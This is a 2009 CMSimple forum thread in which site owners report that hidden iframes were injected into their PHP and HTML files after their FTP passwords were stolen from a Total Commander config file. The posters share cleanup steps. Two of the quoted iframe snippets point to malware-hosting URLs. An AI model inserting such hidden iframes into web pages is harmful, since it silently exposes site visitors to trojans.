General questions about CMSimple
-
Tata
- Posts: 3588
- Joined: Tue May 20, 2008 5:34 am
- Location: Slovakia
-
Contact:
Post
by Tata » Wed Jun 17, 2009 2:29 pm
Yesterday I have found that not only my PC was infected by about 50 Trojans, but also all webpages I have built were hacked. There was inserted an IFRAME with "display:hidden" attribute in almost all HTM and PHP files. Some hacker has found a way of steeling FTP passwords.
The code
Code: Select all
<iframe src="h**p://jL.chura.pl/rc/" style="display:none"></iframe>
(**=tp) is mostly inserted just before the last "?>" or "<BODY>". Now I need to:
- Change all FTP passwords
- dowload and clear all websites - all possibly infectable files
- change all login-psswords
- upload them back
- stop using TotalCommander FTP client
If you experience the same problem and have a knowledge how to make it easier, please let us know.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
-
Connie
- Posts: 282
- Joined: Thu May 22, 2008 10:11 am
- Location: Hamburg
-
Contact:
Post
by Connie » Wed Jun 17, 2009 5:27 pm
that's just plain sh..., I can image how angry you are now...
keep on!
Connie
-
Tata
- Posts: 3588
- Joined: Tue May 20, 2008 5:34 am
- Location: Slovakia
-
Contact:
Post
by Tata » Wed Jun 17, 2009 9:39 pm
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
-
Holger
- Site Admin
- Posts: 3470
- Joined: Mon May 19, 2008 7:10 pm
- Location: Hessen, Germany
Post
by Holger » Thu Jun 18, 2009 6:46 am
Tata wrote:Some hacker has found a way of steeling FTP passwords
Hmm, are you sure?
Have you checked the server-ftp-logfiles?
Holger
-
Tata
- Posts: 3588
- Joined: Tue May 20, 2008 5:34 am
- Location: Slovakia
-
Contact:
Post
by Tata » Thu Jun 18, 2009 11:22 am
Holger wrote:Hmm, are you sure? Have you checked the server-ftp-logfiles?
Holger
That's what I have found on forums about tis danger. And I have not yet study the log-files. I am working on reinstallation of my home and office PCs since yesterday
. I have read that TotalCommander FTP client has (up to version 7.4x) some holes and poor encrypted passwords. So the virus searches after wcx_ftp.ini file. If found, reads all logins saved in it and uses them to intrude and send them over to other computers. The page nserted in this hidden IFRAME seems to be full of Trojans.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
-
CMSimple-Styles.com
- Posts: 342
- Joined: Thu Jun 26, 2008 8:19 pm
- Location: Germany
-
Contact:
Post
by CMSimple-Styles.com » Thu Jun 18, 2009 11:33 am
I can recommend PrevX Secruity, it is not well known but in my opinion the best anti virus detection. Let it run on your PC it may help.
-
Martin
- Posts: 346
- Joined: Thu Oct 23, 2008 11:57 am
-
Contact:
Post
by Martin » Thu Jun 18, 2009 12:40 pm
That sounds mean, sounds like your local machine is infected with some variant of the file infector virus "virut". Perhaps you have better luck, but it would be hard to get rid of this one, because you could not trust any of your "exe" and "scr" files. Perhaps you find an easier solution, but probably you would have to reformat your disk and reinstall your OS (without any .exe or .scr file from your "old" system) and clean up all your .html, .php and .asp files (with an editor with no html-preview) and change all your banking, email ... passwords.
I really hope you do not have to go through this long story of work and loss!
Martin
-
Tata
- Posts: 3588
- Joined: Tue May 20, 2008 5:34 am
- Location: Slovakia
-
Contact:
Post
by Tata » Thu Jun 18, 2009 7:27 pm
Actually, it is 21:25 right now and I succeeded to reformat entirely one of my 2 infected PC and I am starting from "0" now. I have no imagine what time will I spend on downloading/cleaning/uploadong all websites I have access to. Brrrrrrrrrrrrrrr
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
-
gerepeer
- Posts: 39
- Joined: Fri May 23, 2008 1:21 pm
Post
by gerepeer » Sat Jul 11, 2009 1:15 am
Hello,
Last night i saw that 2 of my sites were down and went to take a look, it seems that someone found out my paswords , a way into cmsimple or i did not have the rights set right but i found out that in every folder every index.php or index.html file was changed and added an iframe.
Code: Select all
<iframe src="http://a5h.ru:8080/ts/in.cgi?pepsi97" width=125 height=125 style="visibility: hidden"></iframe>
I was not able to vind out what this had to leed to but maybe someone that speaks/reads russian is able to tell me what they intended.
Fortunatly i have some backups but if results that hackers have found a way in then the community should start to worry.
Hope it`s just me and will have to studdy chmod rights again.
Gerepeer
-
Tata
- Posts: 3588
- Joined: Tue May 20, 2008 5:34 am
- Location: Slovakia
-
Contact:
Post
by Tata » Sat Jul 11, 2009 7:08 am
Well, there is nothing in Rissuan. But I have found in some forum what's this about. The hacker has written a script that reads the file containing your TotalCommanderFTP passwords. They are abviously poor encrypted. Then it put this hidden IFRAME into any index.php, index.htm (in my case also into any HTM) file not only in your websites but also in your local PC. The visitor is then invisibly redirected to a page from which it loads a bunch of Trojans. The only way how to solve this horror is (at least I must do it):
- download all websites to our HDD
- with Notepad++ or PSPad search for the IFRAME code and Replace it by an empty line
- Upload averything back
- Delete all passwords from FTP Client
There is still the danger, that your PC is full of Trojans rewriting any EXE. But this is another story. Maybe there are already some removers on the net. But there weren't any 3 weeks ago and I needed to re-install my entire PC.
In this case:
- Make an exact copy of all important files on a removable drive.
- reformat your infected partitions
- install your OS
- install your antivirus
- install PSPad
- search for the IFRAME code and Replace it to an empty line in any file on your removable drive - if you find there any.
I am sorry for you. But Enjoy the least creative work on PC.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.